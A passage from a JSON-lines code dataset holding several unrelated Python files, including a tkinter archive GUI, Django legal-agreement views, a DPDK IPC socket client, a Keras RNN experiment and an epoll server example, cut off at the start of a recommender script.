= {}\n list = exec(\"list = \"+run, None, locals)\n big_hop_list.extend(locals[\"list\"])\n\n run = file.replace(\".py\",\"\")+\".crawl_yeasts()\"\n locals = {}\n list = exec(\"list = \"+run, None, locals)\n big_yeast_list.extend(locals[\"list\"])\n\n dump_to_json(\"malt\", big_malt_list)\n dump_to_json(\"hop\", big_hop_list)\n dump_to_json(\"yeast\", big_yeast_list)","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"532588235","text":"from os import listdir\nfrom os.path import isfile, join\nimport numpy as np \nfolder = '/share/DEEPLEARNING/datasets/voc2012/VOCdevkit/VOC2012'\nimages = 'JPEGImages'\nmask = 'SegmentationClassAug'\npath = 'voc_splits/clean_train.txt'\n\nexamples = 2126\n\nwith open(path) as f:\n onlyfiles = f.readlines()\n# you may also want to remove whitespace characters like `\\n` at the end of each line\nonlyfiles = np.array([x.strip() for x in onlyfiles] )\nnp.random.shuffle(onlyfiles)\n\nsupervised = onlyfiles[:examples]\nunsupervised = onlyfiles[examples+2:examples*2+2]\n\nprint(len(supervised))\nprint(len(unsupervised))\n\n\nf_supervised = str(examples)+'_train_supervised.txt'\nf_unsupervised = str(examples)+'_train_unsupervised.txt'\n\n# Supervised\ntextfile = open(join('voc_splits',f_supervised), \"w\")\n\nfor element in supervised:\n textfile.write('/'+join(images,element+'.jpg')+' '+'/'+join(mask,element+'.png') + \"\\n\")\n\ntextfile.close()\n\n# Unsupervised \ntextfile = open(join('voc_splits',f_unsupervised), \"w\")\n\nfor element in unsupervised:\n textfile.write('/'+join(images,element+'.jpg')+' '+'/'+join(mask,element+'.png') + \"\\n\")\n\ntextfile.close()\n\n\n","sub_path":"dataloaders/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"270858274","text":"#!/usr/bin/env python3\n\n\"\"\"Main tkinter GUI file used by Windows OS.\"\"\"\n\nimport exceptions\nimport logging\nimport os\nimport os.path\nimport saf\nimport tkinter as tk\nfrom tkinter import filedialog\nfrom tkinter import ttk\n\n\nclass GuiTk():\n \"\"\"Class for main tkinter GUI.\"\"\"\n\n def __init__(self, root, gs):\n \"\"\"Class variables for GuiTk class.\"\"\"\n self.root = root\n self.root.title('PySAF')\n\n self.main_frame = ttk.Frame(self.root)\n self.main_frame.pack(expand=True, fill='both')\n\n self.dir_frame = ttk.Frame(self.main_frame)\n self.dir_frame.grid(row=1)\n\n self.zip_frame = ttk.Frame(self.main_frame)\n self.zip_frame.grid(row=2)\n\n self.license_frame = ttk.Frame(self.main_frame)\n self.license_frame.grid(row=3)\n\n self.access_frame = ttk.Frame(self.main_frame)\n self.access_frame.grid(row=4)\n\n self.create_frame = ttk.Frame(self.main_frame)\n self.create_frame.grid(row=5)\n\n self.progress_frame = ttk.Frame(self.main_frame)\n self.progress_frame.grid(row=6)\n\n self.csv_file_button = ttk.Button(self.dir_frame,\n width=25,\n text='Select CSV File',\n command=lambda: self.csv_file_open(gs))\n self.csv_file_button.grid(column=0, row=1, sticky='e')\n self.csv_file_var = tk.StringVar()\n self.csv_file_entry = ttk.Entry(self.dir_frame,\n width=60,\n textvariable=self.csv_file_var)\n self.csv_file_entry.grid(column=1, row=1, sticky='nsew')\n\n self.bit_dir_button = ttk.Button(self.dir_frame,\n width=25,\n text='Select Location of Files',\n command=lambda: self.bit_dir_open(gs))\n self.bit_dir_button.grid(column=0, row=2, sticky='e')\n self.bit_dir_var = tk.StringVar()\n self.bit_dir_entry = ttk.Entry(self.dir_frame,\n width=60,\n textvariable=self.bit_dir_var)\n self.bit_dir_entry.grid(column=1, row=2, sticky='nsew')\n\n self.archive_dir_button = ttk.Button(self.dir_frame,\n width=25,\n text='Select Archive Destination',\n command=lambda: self.archive_dir_open(gs))\n self.archive_dir_button.grid(column=0, row=3, sticky='e')\n self.archive_dir_var = tk.StringVar()\n self.archive_dir_entry = ttk.Entry(self.dir_frame,\n width=60,\n textvariable=self.archive_dir_var)\n self.archive_dir_entry.grid(column=1, row=3, sticky='nsew')\n\n self.zip_button_var = tk.IntVar()\n self.zip_button = ttk.Checkbutton(self.zip_frame,\n text='Create ZIP File',\n variable=self.zip_button_var,\n command=lambda: self.create_zip_button(gs))\n self.zip_button.grid(row=1, columnspan=3)\n\n self.license_button_var = tk.IntVar()\n self.license_button = ttk.Checkbutton(self.license_frame,\n text='Create License',\n variable=self.license_button_var,\n command=lambda: self.create_license_button(gs))\n self.license_button.grid(row=1, columnspan=2)\n\n self.access_button_var = tk.IntVar()\n self.access_button = ttk.Checkbutton(self.access_frame,\n text='Restrict Read Access',\n variable=self.access_button_var,\n command=lambda: self.restrict_access_button(gs))\n self.access_button.grid(row=1, columnspan=2)\n\n self.create_button = ttk.Button(self.create_frame,\n text='Create Archive',\n command=lambda: self.error_check(gs))\n self.create_button.grid(columnspan=2)\n\n for child in self.main_frame.winfo_children():\n child.grid_configure(padx=40, pady=15)\n\n for child in self.dir_frame.winfo_children():\n child.grid_configure(padx=5, pady=5)\n\n def csv_file_open(self, gs):\n \"\"\"Open filedialog when Select CSV File button selected.\"\"\"\n self.csv_file_path = filedialog.askopenfilename()\n gs.csv_path = self.csv_file_path\n self.csv_file_var.set(self.csv_file_path)\n\n def bit_dir_open(self, gs):\n \"\"\"Open filedialog when Select Location of Files button selected.\"\"\"\n self.bit_dir_path = filedialog.askdirectory()\n gs.bit_path = self.bit_dir_path\n self.bit_dir_var.set(self.bit_dir_path)\n\n def archive_dir_open(self, gs):\n \"\"\"Open filedialog when Select Archive Destination button selected.\"\"\"\n self.archive_dir_path = filedialog.askdirectory()\n gs.archive_path = self.archive_dir_path\n self.archive_dir_var.set(self.archive_dir_path)\n\n def create_zip_button(self, gs):\n \"\"\"Expand frame to reveal options when Create ZIP File is selected.\"\"\"\n if self.zip_button_var.get() == 1:\n self.split_button_var = tk.IntVar()\n self.split_button = ttk.Checkbutton(self.zip_frame,\n text='Split ZIP File',\n variable=self.split_button_var)\n self.split_button.grid(row=2, column=0, sticky='w')\n self.split_button.grid_configure(padx=2, pady=5)\n self.split_entry_var = tk.IntVar()\n self.split_entry = ttk.Entry(self.zip_frame,\n width=3,\n justify='right',\n textvariable=self.split_entry_var)\n self.split_entry.grid(row=2, column=1, sticky='e')\n self.split_entry.grid_configure(pady=5)\n self.split_entry_var.set('2')\n self.split_combo = ttk.Combobox(self.zip_frame,\n width=4,\n justify='left',\n values='MB GB')\n self.split_combo.current(1)\n self.split_combo.grid(row=2, column=2, sticky='w')\n self.split_combo.grid_configure(pady=5)\n else:\n self.split_button.destroy()\n self.split_entry.destroy()\n self.split_combo.destroy()\n\n def create_license_button(self, gs):\n \"\"\"Expanded frame to reveal options when Create License is selected.\"\"\"\n if self.license_button_var.get() == 1:\n self.license_file_label = ttk.Label(self.license_frame,\n width=20,\n anchor=tk.E,\n text='License File Name ')\n self.license_file_label.grid(row=2, column=0, sticky='e')\n self.license_file_var = tk.StringVar()\n self.license_file_entry = ttk.Entry(self.license_frame,\n width=20,\n textvariable=self.license_file_var)\n self.license_file_entry.grid(row=2, column=1, sticky='w')\n self.license_file_entry.grid_configure(pady=5)\n self.license_file_var.set('license.txt')\n\n self.license_bundle_label = ttk.Label(self.license_frame,\n width=20,\n anchor=tk.E,\n text='Bundle Name ')\n self.license_bundle_label.grid(row=3, column=0, sticky='e')\n self.license_bundle_var = tk.StringVar()\n self.license_bundle_entry = ttk.Entry(self.license_frame,\n width=20,\n textvariable=self.license_bundle_var)\n self.license_bundle_entry.grid(row=3, column=1, sticky='w')\n self.license_bundle_entry.grid_configure(pady=5)\n self.license_bundle_var.set('LICENSE')\n\n self.license_text_label = ttk.Label(self.license_frame,\n text='Enter License Text Below:')\n self.license_text_label.grid(row=4, columnspan=2)\n self.license_text_label.grid_configure(pady=5)\n self.license_var = tk.StringVar()\n self.license_text = tk.Text(self.license_frame,\n height=5,\n width=65,\n highlightthickness=1,\n highlightcolor='gray',\n highlightbackground='gray')\n self.license_text.config(wrap='word')\n self.license_text.grid(row=5, columnspan=2)\n self.license_text.grid_configure(pady=5)\n else:\n self.license_file_label.destroy()\n self.license_file_entry.destroy()\n self.license_bundle_label.destroy()\n self.license_bundle_entry.destroy()\n self.license_text_label.destroy()\n self.license_text.destroy()\n\n def restrict_access_button(self, gs):\n \"\"\"Expand frame to reveal options when Restrict Read Access is selected.\"\"\"\n if self.access_button_var.get() == 1:\n self.group_name_label = ttk.Label(self.access_frame,\n width=20,\n anchor=tk.E,\n text='Group Name ')\n self.group_name_label.grid(row=2, column=0, sticky='e')\n self.group_name_label.grid_configure(pady=5)\n self.group_name_var = tk.StringVar()\n self.group_name_entry = ttk.Entry(self.access_frame,\n width=20,\n textvariable=self.group_name_var)\n self.group_name_entry.grid(row=2, column=1, sticky='w')\n self.group_name_entry.grid_configure(pady=5)\n self.group_name_var.set('member')\n else:\n self.group_name_label.destroy()\n self.group_name_entry.destroy()\n\n def get_vars(self, gs):\n \"\"\"Get variables from tkinter widgets.\"\"\"\n gs.csv_path = self.csv_file_var.get()\n gs.bit_path = self.bit_dir_var.get()\n gs.archive_path = self.archive_dir_var.get()\n if self.zip_button_var.get():\n gs.create_zip = self.zip_button_var.get()\n gs.split_zip = self.split_button_var.get()\n gs.zip_size = self.split_entry.get()\n gs.zip_unit = self.split_combo.get()\n else:\n gs.create_zip = self.zip_button_var.get()\n if self.license_button_var.get():\n gs.create_license = self.license_button_var.get()\n gs.license_file = self.license_file_entry.get()\n gs.license_bundle = self.license_bundle_entry.get()\n gs.license_text = self.license_text.get('1.0', 'end-1c')\n else:\n gs.create_license = self.license_button_var.get()\n if self.access_button_var.get():\n gs.restrict_access = self.access_button_var.get()\n gs.group_name = self.group_name_entry.get()\n else:\n gs.restrict_access = self.access_button_var.get()\n\n def update_archive_button(self):\n \"\"\"Update Create Archive button to alert user to processing status.\"\"\"\n if (self.create_button.config('text')[-1] == 'Create Archive'):\n self.create_button.config(text='Processing ... Please wait.')\n self.root.update_idletasks()\n elif (self.create_button.config('text')[-1] == 'Processing ... Please wait.'):\n self.create_button.config(text='Create Archive')\n self.root.update_idletasks()\n\n def create_archive(self, gs):\n \"\"\"Handle method calls to CreateArchive class.\"\"\"\n ca = saf.CreateArchive(gs)\n if ca.split_zip:\n ca.open_csv_split()\n else:\n ca.open_csv()\n if ca.create_zip:\n ca.zip_archive()\n\n def main(self, gs):\n \"\"\"Change Create Archive button status before and after calls to CreateArchive class.\"\"\"\n self.update_archive_button()\n self.create_archive(gs)\n self.update_archive_button()\n\n def error_check(self, gs):\r\n \"\"\"Method for handling exceptions.\"\"\"\r\n ca = saf.CreateArchive(gs)\r\n self.get_vars(gs)\r\n try:\r\n if not gs.csv_path:\r\n raise IOError\r\n except IOError:\r\n exceptions.TkError.empty_csv_path_error()\r\n self.create_button.config(text='Create Archive')\r\n else:\r\n try:\r\n if not gs.bit_path:\r\n raise IOError\r\n except IOError:\r\n exceptions.TkError.empty_bit_path_error()\r\n self.create_button.config(text='Create Archive')\r\n else:\r\n try:\r\n if not gs.archive_path:\r\n raise IOError\r\n except IOError:\r\n exceptions.TkError.empty_archive_path_error()\r\n self.create_button.config(text='Create Archive')\r\n else:\r\n try:\r\n if gs.create_license:\r\n if not gs.license_text:\r\n raise IOError\r\n except IOError:\r\n exceptions.TkError.license_text_error()\r\n self.create_button.config(text='Create Archive')\r\n else:\r\n try:\r\n if not gs.csv_path.endswith('.csv'):\r\n raise TypeError\r\n except TypeError:\r\n exceptions.TkError.type_error()\r\n self.create_button.config(text='Create Archive')\r\n else:\r\n try:\r\n ca.duplicate_file_name()\r\n except IOError:\r\n self.create_button.config(text='Create Archive')\r\n except UnicodeDecodeError:\r\n exceptions.TkError.unicode_decode_error()\r\n self.create_button.config(text='Create Archive')\r\n else:\r\n try:\r\n ca.duplicate_bit_name()\r\n except IOError:\r\n self.create_button.config(text='Create Archive')\r\n else:\r\n try:\r\n ca.missing_files()\r\n except IOError:\r\n self.create_button.config(text='Create Archive')\r\n else:\r\n try:\r\n self.main(gs)\r\n except UnicodeDecodeError:\r\n exceptions.TkError.unicode_decode_error()\r\n self.create_button.config(text='Create Archive')\r\n except FileExistsError:\r\n exceptions.TkError.file_exists_error()\r\n self.create_button.config(text='Create Archive')\r\n except IndexError:\r\n exceptions.TkError.index_error()\r\n self.create_button.config(text='Create Archive')\r\n except Exception:\r\n logging.basicConfig(\r\n level=logging.DEBUG,\r\n filename=(os.path.join(\r\n gs.archive_path,\r\n 'ErrorLog.txt'))\r\n )\r\n logging.exception('Error')\r\n exceptions.TkError.unexpected_error()\r\n self.create_button.config(text='Create Archive')\r\n","sub_path":"pysaf/guiwin.py","file_name":"guiwin.py","file_ext":"py","file_size_in_byte":17197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"72661490","text":"from django.shortcuts import redirect\nfrom .models import LegalAgreement, UserLegalAgreement\nfrom django.views import generic\nfrom django.http import JsonResponse\n\n\nclass LegalAgreementList(generic.ListView):\n template_name = 'legal-agreements.html'\n context_object_name = 'queryset'\n\n def get_queryset(self):\n legals = LegalAgreement.objects.filter(active=True)\n user_agree = UserLegalAgreement.objects.filter(user=self.request.user, agree=True)\n users_agree = list()\n for i in user_agree:\n users_agree.append(i.legal_agrees.id)\n queryset = {'legals': legals, 'users_agree': users_agree}\n return queryset\n\n\ndef get_legal_detail(request):\n if request.GET:\n legal = LegalAgreement.objects.get(id=request.GET.get('legal_id'))\n response = {'title': legal.title, 'text': legal.text}\n return JsonResponse(response)\n\n\ndef set_legal_agree(request):\n user = request.user\n\n list_agree = [int(item) for item in request.POST.getlist('agree')]\n\n legals = LegalAgreement.objects.filter(active=True)\n user_agree = UserLegalAgreement.objects.filter(user=user)\n\n for item in legals:\n if item.id in list_agree:\n new_agree = UserLegalAgreement(\n user=request.user,\n agree=True,\n legal_agrees=item\n )\n new_agree.save()\n\n if user_agree.count() >= legals.count():\n user.profile.all_legal_agree = True\n else:\n user.profile.all_legal_agree = False\n user.profile.save(update_fields=['all_legal_agree'])\n\n return redirect('dashboard')\n","sub_path":"legal_agreements/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"403389158","text":"#! /usr/bin/env python3\n#\n# SPDX-License-Identifier: BSD-3-Clause\n# Copyright (c) 2021 ETH Zurich\n# \n# This script is an adoption of dpdk/usertools/dpdk-telemetry.py:\n# SPDX-License-Identifier: BSD-3-Clause\n# Copyright(c) 2020 Intel Corporation\n\n\"\"\"\nScript to be used with LightningFilter IPC.\nAllows the user input commands and read the response.\n\"\"\"\n\nimport socket\nimport os\nimport sys\nimport glob\nimport json\nimport errno\nimport readline\nimport argparse\n\n# global vars\nSOCKET_NAME = 'lf-ipc'\nDEFAULT_PREFIX = 'rte'\nCMDS = []\nCMDS_SEPERATOR = \"\\t\"\n\ndef read_socket(sock, buf_len, echo=True):\n \"\"\" Read data from socket and return it in as string \"\"\"\n reply = sock.recv(buf_len).decode()\n if echo:\n print(reply)\n return reply\n\n\ndef read_socket_json(sock, buf_len, echo=True):\n \"\"\" Read data from socket and return it in JSON format \"\"\"\n reply = sock.recv(buf_len).decode()\n try:\n ret = json.loads(reply)\n except json.JSONDecodeError:\n print(\"Error in reply: \", reply)\n sock.close()\n raise\n if echo:\n print(json.dumps(ret))\n return ret\n\n\ndef get_app_name(pid):\n \"\"\" return the app name for a given PID, for printing \"\"\"\n proc_cmdline = os.path.join('/proc', str(pid), 'cmdline')\n try:\n with open(proc_cmdline) as f:\n argv0 = f.read(1024).split('\\0')[0]\n return os.path.basename(argv0)\n except IOError as e:\n # ignore file not found errors\n if e.errno != errno.ENOENT:\n raise\n return None\n\n\ndef find_sockets(path):\n \"\"\" Find any possible sockets to connect to and return them \"\"\"\n return glob.glob(os.path.join(path, SOCKET_NAME + '*'))\n\n\ndef print_socket_options(prefix, paths):\n \"\"\" Given a set of socket paths, give the commands needed to connect \"\"\"\n cmd = sys.argv[0]\n if prefix != DEFAULT_PREFIX:\n cmd += \" -f \" + prefix\n for s in sorted(paths):\n sock_name = os.path.basename(s)\n print(\"- {} # Connect with '{}'\".format(os.path.basename(s),\n cmd))\n\ndef get_dpdk_runtime_dir(fp):\n \"\"\" Using the same logic as in DPDK's EAL, get the DPDK runtime directory\n based on the file-prefix and user \"\"\"\n if (os.getuid() == 0):\n return os.path.join('/var/run/dpdk', fp)\n return os.path.join(os.environ.get('XDG_RUNTIME_DIR', '/tmp'), 'dpdk', fp)\n\n\ndef list_fp():\n \"\"\" List all available file-prefixes to user \"\"\"\n path = get_dpdk_runtime_dir('')\n sockets = glob.glob(os.path.join(path, \"*\", SOCKET_NAME + \"*\"))\n prefixes = []\n if not sockets:\n print(\"No LF apps with IPC enabled available\")\n else:\n print(\"Valid file-prefixes:\\n\")\n for s in sockets:\n prefixes.append(os.path.relpath(os.path.dirname(s), start=path))\n for p in sorted(set(prefixes)):\n print(p)\n print_socket_options(p, glob.glob(os.path.join(path, p,\n SOCKET_NAME + \"*\")))\n\n\ndef handle_socket(args, path, interactive=True):\n \"\"\" Connect to socket and handle user input \"\"\"\n prompt = '' # this evaluates to false in conditions\n sock = socket.socket(socket.AF_UNIX, socket.SOCK_SEQPACKET)\n global CMDS\n\n if os.isatty(sys.stdin.fileno()):\n prompt = '--> '\n print(\"Connecting to \" + path)\n try:\n sock.connect(path)\n except OSError:\n print(\"Error connecting to \" + path)\n sock.close()\n # if socket exists but is bad, or if non-interactive just return\n if os.path.exists(path) or not prompt:\n return\n # if user didn't give a valid socket path, but there are\n # some sockets, help the user out by printing how to connect\n socks = find_sockets(os.path.dirname(path))\n if socks:\n print(\"\\nOther LF IPC sockets found:\")\n print_socket_options(args.file_prefix, socks)\n else:\n list_fp()\n return\n json_reply = read_socket_json(sock, 1024, prompt)\n output_buf_len = json_reply[\"max_output_len\"]\n app_name = get_app_name(json_reply[\"pid\"])\n if app_name and prompt:\n print('Connected to application: \"%s\"' % app_name)\n\n if interactive:\n # interactive prompt\n # get list of commands for readline completion\n sock.send(\"/\".encode())\n cmd_list = read_socket(sock, output_buf_len, False)\n CMDS = [cmd for cmd in cmd_list.split(CMDS_SEPERATOR) if len(cmd) > 0]\n print(CMDS)\n\n try:\n text = input(prompt).strip()\n while text != \"quit\":\n if text.startswith('/'):\n sock.send(text.encode())\n read_socket(sock, output_buf_len)\n text = input(prompt).strip()\n except EOFError:\n pass\n finally:\n sock.close()\n else:\n try:\n text = \"\"\n if (args.cmd):\n text += args.cmd\n if(args.params):\n text += \",\"\n text += args.params\n \n sock.send(text.encode())\n read_socket(sock, output_buf_len)\n finally:\n sock.close()\n\n\ndef readline_complete(text, state):\n \"\"\" Find any matching commands from the list based on user input \"\"\"\n all_cmds = ['quit'] + CMDS\n if text:\n matches = [c for c in all_cmds if c.startswith(text)]\n else:\n matches = all_cmds\n return matches[state]\n\n\nreadline.parse_and_bind('tab: complete')\nreadline.set_completer(readline_complete)\nreadline.set_completer_delims(readline.get_completer_delims().replace('/', ''))\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-f', '--file-prefix', default=DEFAULT_PREFIX,\n help='Provide file-prefix for DPDK runtime directory')\nparser.add_argument('-i', '--instance', default='0', type=int,\n help='Provide instance number for DPDK application')\nparser.add_argument('-l', '--list', action=\"store_true\", default=False,\n help='List all possible file-prefixes and exit')\nparser.add_argument('--cmd', help='Provide command (disables interactive mode)')\nparser.add_argument('--params', help='Provide parameter (disables interactive mode)')\n\nargs = parser.parse_args()\nif args.list:\n list_fp()\n sys.exit(0)\nsock_path = os.path.join(get_dpdk_runtime_dir(args.file_prefix), SOCKET_NAME)\nif args.instance > 0:\n sock_path += \":{}\".format(args.instance)\n\nif args.cmd or args.params:\n handle_socket(args, sock_path, False)\nelse:\n handle_socket(args, sock_path)","sub_path":"usertools/lf-ipc.py","file_name":"lf-ipc.py","file_ext":"py","file_size_in_byte":6586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"37566939","text":"from __future__ import print_function\nfrom functools import reduce\n\n#import numpy as np\nimport numpy\nimport matplotlib.pyplot as plt\nimport pandas\nimport math\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers import SimpleRNN\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n#from keras.utils.visualize_util import plot\n\nepochs_num=100\n\n# convert an array of values into a dataset matrix\ndef create_dataset(dataset, look_back=1):\n\tdataX, dataY = [], []\n\tfor i in range(len(dataset)-look_back-1):\n\t\ta = dataset[i:(i+look_back), 0]\n\t\tdataX.append(a)\n\t\tdataY.append(dataset[i + look_back, 0])\n\treturn numpy.array(dataX), numpy.array(dataY)\n\n# convert an array of values into a dataset matrix\ndef create_dataset_2(dataset_in, dataset_out, look_back=1):\n\tdataX, dataY = [], []\n\tfor i in range(len(dataset_in)-look_back-1):\n\t\ta = dataset_in[i:(i+look_back), 0]\n\t\tdataX.append(a)\n\t\tdataY.append(dataset_out[i + look_back, 0])\n\treturn numpy.array(dataX), numpy.array(dataY)\n\n\n\n# fix random seed for reproducibility\nnumpy.random.seed(7)\n\n# load the dataset\ndataframe = pandas.read_csv('international-airline-passengers.csv', usecols=[1], engine='python', skipfooter=3)\ndataset = dataframe.values\ndataset = dataset.astype('float32')\n# normalize the dataset\nscaler = MinMaxScaler(feature_range=(0, 1))\ndataset = scaler.fit_transform(dataset)\n# split into train and test sets\ntrain_size = int(len(dataset) * 0.67)\ntest_size = len(dataset) - train_size\nprint\nprint('dataset: ', dataset)\nprint\nprint('dataset.shape[0]: ', dataset.shape[0])\nprint('dataset.shape[1]: ', dataset.shape[1])\ntrain, test = dataset[0:train_size,:], dataset[train_size:len(dataset),:]\nprint\nprint('train: ', train)\nprint( 'test:', test)\nprint\n\n#def generate_dummy_dataset(samples_num):\n# in_value = 0.5\n# in_list = []\n# out_list = []\n# for iter in range(samples_num):\n# in_list.append([in_value])\n# out_list.append([in_value])\n# in_value += 1.0 / 1000\n# return (np.array(in_list), np.array(out_list))\n\n\n# Generate trainning samples\nimport SampleCreator as sc\ngen_dataset = sc.SampleCreator()\n(train_input_list, train_output_list) = gen_dataset.generate(100)\n(test_input_list, test_output_list) = gen_dataset.generate(100)\n# END OF Generate trainning samples\n#(train_input_list, train_output_list) = generate_dummy_dataset(100)\n#(test_input_list, test_output_list) = generate_dummy_dataset(100)\nprint\nprint('train_input_list',train_input_list)\nprint('train_output_list',train_output_list)\n\n\n# reshape into X=t and Y=t+1\nlook_back = 50\ntrainX, trainY = create_dataset(train, look_back)\ntestX, testY = create_dataset(test, look_back)\nprint\nprint('trainX', trainX)\nprint('trainY', trainY)\nprint\nprint('trainX.shape[0]', trainX.shape[0])\nprint\nprint('trainX.shape[1]', trainX.shape[1])\n\ntrainX, trainY = create_dataset_2(train_input_list, train_output_list, look_back)\ntestX, testY = create_dataset_2(test_input_list, test_output_list, look_back)\nprint\nprint('trainX', trainX)\nprint('trainY', trainY)\nprint\nprint('trainX.shape[0]', trainX.shape[0])\nprint\nprint('trainX.shape[1]', trainX.shape[1])\n\n\n# reshape input to be [samples, time steps, features]\ntrainX = numpy.reshape(trainX, (trainX.shape[0], trainX.shape[1], 1))\ntestX = numpy.reshape(testX, (testX.shape[0], testX.shape[1], 1))\nprint\n#print('trainX', trainX)\n\n# create and fit the LSTM network\nmodel = Sequential()\n#model.add(LSTM(4, input_dim=1))\nmodel.add(SimpleRNN(1, return_sequences=True, input_dim=1))\n#model.add(Dense(1))\nmodel.add(SimpleRNN(1))\n#model.compile(loss='mean_squared_error', optimizer='adam')\nmodel.compile(loss='mean_squared_error', optimizer='rmsprop')\n\n#plot(model, to_file='model_SimpleRNN_2layers_out=1_lb=2_TrEr0.16RMSE_TstEr0.26RMSE.png')\n\nmodel.fit(trainX, trainY, nb_epoch=epochs_num, batch_size=1, verbose=2)\n\n# make predictions\ntrainPredict = model.predict(trainX)\ntestPredict = model.predict(testX)\n\n# invert predictions\n#trainPredict = scaler.inverse_transform(trainPredict)\n#trainY = scaler.inverse_transform([trainY])\ntrainY = [trainY]\n#testPredict = scaler.inverse_transform(testPredict)\n#testY = scaler.inverse_transform([testY])\ntestY = [testY]\n\n# calculate root mean squared error\ntrainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:,0]))\nprint('Train Score: %.2f RMSE' % (trainScore))\ntestScore = math.sqrt(mean_squared_error(testY[0], testPredict[:,0]))\nprint('Test Score: %.2f RMSE' % (testScore))\n\n# shift train predictions for plotting\n#trainPredictPlot = numpy.empty_like(dataset)\n#trainPredictPlot[:, :] = numpy.nan\n#trainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict\n\n# shift test predictions for plotting\n#testPredictPlot = numpy.empty_like(dataset)\n#testPredictPlot[:, :] = numpy.nan\n#testPredictPlot[len(trainPredict)+(look_back*2)+1:len(dataset)-1, :] = testPredict\n\n# plot baseline and predictions\nplt.figure(1)\nplt.title(\"look_back=%d TrEr=%.2fRMSE TstEr=%.2fRMSE\" % (look_back, trainScore, testScore))\nplt.subplot(311)\nplt.ylabel('Input')\nplt.plot(train_input_list)\n#plt.plot(train_output_list)\n#plt.plot(scaler.inverse_transform(dataset))\nplt.subplot(312)\nplt.ylabel('Train t(b) o(g)')\nplt.plot(train_output_list[3:])\nplt.plot(trainPredict)\nplt.subplot(313)\nplt.ylabel('Test t(b) o(g)')\nplt.xlabel('Sample series')\n#plt.plot(scaler.inverse_transform(test_input_list))\nplt.plot(test_output_list[3:])\nplt.plot(testPredict)\nplt.show()\n","sub_path":"keras/exp2-test.py","file_name":"exp2-test.py","file_ext":"py","file_size_in_byte":5488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"126711527","text":"\"\"\"\n基于epoll的网络并发模型\n重点代码 !!\n\"\"\"\n\nfrom socket import *\nfrom select import *\n\n# 地址\nHOST = \"0.0.0.0\"\nPORT = 8888\nADDR = (HOST, PORT)\n\n\ndef main():\n # tcp套接字 连接客户端\n sock = socket()\n sock.bind(ADDR)\n sock.listen(5)\n print(\"Listen the port %d\" % PORT)\n\n # 防止IO处理过程中产生阻塞行为\n sock.setblocking(False)\n\n # 设置要监控的IO\n ep = epoll()\n ep.register(sock, EPOLLIN)\n\n # 查找字典 通过文件描述符 --》 IO对象\n map = {sock.fileno(): sock}\n\n # 循环接收客户端连接\n while True:\n events = ep.poll() # events->[(fileno,event)]\n print(\"你有新的IO需要处理哦\",events)\n # 逐个取值,分情况讨论\n for fd, event in events:\n if fd == sock.fileno():\n connfd, addr = map[fd].accept()\n print(\"Connect from\", addr)\n # 将客户端套接字添加到监控列表\n connfd.setblocking(False)\n ep.register(connfd, EPOLLIN|EPOLLET) # 设置触发\n map[connfd.fileno()] = connfd # 维护字典\n # else:\n # # 连接套接字就绪\n # data = map[fd].recv(1024).decode()\n # # 客户端退出\n # if not data:\n # ep.unregister(fd) # 不再监控\n # map[fd].close()\n # del map[fd] # 从字典删除\n # continue\n # print(data)\n # map[fd].send(b\"OK\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"fancy_month02/day16_IO/day16_teacher/epoll_server.py","file_name":"epoll_server.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"168440195","text":"import os\nfrom shutil import copy2\n\n\nrootdir = 'svg'\ndist = 'dist'\n\nfor subdir, dirs, files in os.walk(rootdir):\n for file in files:\n fileName = file.split('.')\n subSplit = subdir.split('/')\n\n newFilename = '.'\n seq = (subSplit[1], fileName[1])\n newFilename = newFilename.join(seq)\n # print(newFilename)\n oldPath = os.path.join(subdir, file)\n newPath = os.path.join(dist, fileName[0], newFilename)\n print(oldPath)\n print(newPath)\n\n if not os.path.exists(os.path.dirname(newPath)):\n try:\n os.makedirs(os.path.dirname(newPath))\n except OSError as exc: # Guard against race condition\n if exc.errno != errno.EEXIST:\n raise\n\n copy2(oldPath, newPath)\n # print os.path.join(subdir, file)","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"361279539","text":"import logging\nimport os\nimport argparse\nimport codecs\nimport time\nimport numpy as np\nimport tqdm\nimport pandas\nfrom scipy.sparse import coo_matrix\n\nfrom implicit.als import AlternatingLeastSquares\nfrom implicit.approximate_als import (AnnoyAlternatingLeastSquares, FaissAlternatingLeastSquares,\n NMSLibAlternatingLeastSquares)\nfrom implicit.bpr import BayesianPersonalizedRanking\nfrom implicit.lmf import LogisticMatrixFactorization\nfrom implicit.nearest_neighbours import (BM25Recommender, CosineRecommender,\n TFIDFRecommender, bm25_weight)\nfrom implicit.evaluation import ranking_metrics_at_k, train_test_split\n\n# maps command line model argument to class name\nMODELS = {\"als\": AlternatingLeastSquares,\n \"nmslib_als\": NMSLibAlternatingLeastSquares,\n \"annoy_als\": AnnoyAlternatingLeastSquares,\n \"faiss_als\": FaissAlternatingLeastSquares,\n \"tfidf\": TFIDFRecommender,\n \"cosine\": CosineRecommender,\n \"bpr\": BayesianPersonalizedRanking,\n \"lmf\": LogisticMatrixFactorization,\n \"bm25\": BM25Recommender}\n\n\ndef main():\n # setup args\n parser = argparse.ArgumentParser(description=\"\"\"Generates recommendations for each user.\nExpects the input data to be 